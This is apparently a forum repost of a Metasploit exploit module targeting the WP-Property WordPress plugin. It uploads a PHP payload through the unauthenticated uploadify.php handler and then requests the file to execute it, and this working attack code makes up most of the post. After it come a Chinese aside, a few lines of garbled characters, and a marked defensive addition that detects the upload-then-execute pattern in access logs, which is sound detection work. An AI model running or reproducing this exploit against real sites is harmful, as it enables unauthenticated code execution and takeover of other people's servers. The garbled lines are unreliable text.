WordPress WP-Property PHP File Upload Vulnerability

Original poster, posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987' ],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Vulnerability check: the plugin's bundled uploadify.php answers a plain GET
  # with HTTP 200 when it is reachable without authentication.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random file name for the PHP payload; uploadify.php writes it into the
    # directory named by the "folder" form field and echoes the resulting path.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is the URI of the file just written.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

/ T' ], ]) E2 m$ s6 m! T不要问我这写的是什么 怎么利用 我是说msf.
* ?  M8 m+ ~) Z! ]) L! H- }  l
' J5 V, d2 M! f/ g5 r7 P& U
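A defender-side addition, not part of this post or of the Metasploit module above: the module's upload-then-execute sequence (a POST to uploadify.php, then a GET of a freshly named .php file in the same uploadify directory) leaves a distinctive pair of web-server access-log entries, and the script below flags that pair, plus bare GET probes of uploadify.php like the module's check method, over a few constructed combined-format log lines. The log format, IPs and file name are assumptions made for the example.

```python
import re
from collections import defaultdict

# Apache/nginx combined-log-format fields we need (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The unauthenticated upload handler bundled with WP-Property <= 1.35.0.
UPLOADIFY_DIR = "/wp-content/plugins/wp-property/third-party/uploadify/"
UPLOADER = UPLOADIFY_DIR + "uploadify.php"


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_chains(lines):
    """Return one alert per suspicious request, in log order.

    stages: "probe"   - GET of uploadify.php itself (what the module's check does)
            "upload"  - POST to uploadify.php (the unauthenticated file write)
            "execute" - GET of another .php file in the uploadify directory by a
                        client that already POSTed to uploadify.php
            "suspicious_get" - same GET without a preceding upload from that client
    """
    uploaded = defaultdict(int)  # client ip -> number of POSTs seen to uploadify.php
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        stage = None
        if path.endswith(UPLOADER):
            stage = "upload" if rec["method"] == "POST" else "probe"
            if stage == "upload":
                uploaded[rec["ip"]] += 1
        elif rec["method"] == "GET" and UPLOADIFY_DIR in path and path.endswith(".php"):
            stage = "execute" if uploaded[rec["ip"]] else "suspicious_get"
        if stage:
            alerts.append({"ip": rec["ip"], "stage": stage, "path": path, "ts": rec["ts"]})
    return alerts


# Constructed sample log: one client runs the full upload/execute sequence,
# a second client only probes the handler.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/ HTTP/1.1" 200 5123',
    '203.0.113.5 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress' + UPLOADER + ' HTTP/1.1" 200 71',
    '203.0.113.5 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress' + UPLOADIFY_DIR + 'xkqzr.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [04/Jan/2013:19:52:00 +0800] "GET /wordpress' + UPLOADER + ' HTTP/1.1" 200 0',
]
```

Running `find_upload_chains(SAMPLE_LOG)` yields three alerts (upload, execute, probe); on real logs, treat an "execute" hit as a confirmed compromise and the others as leads.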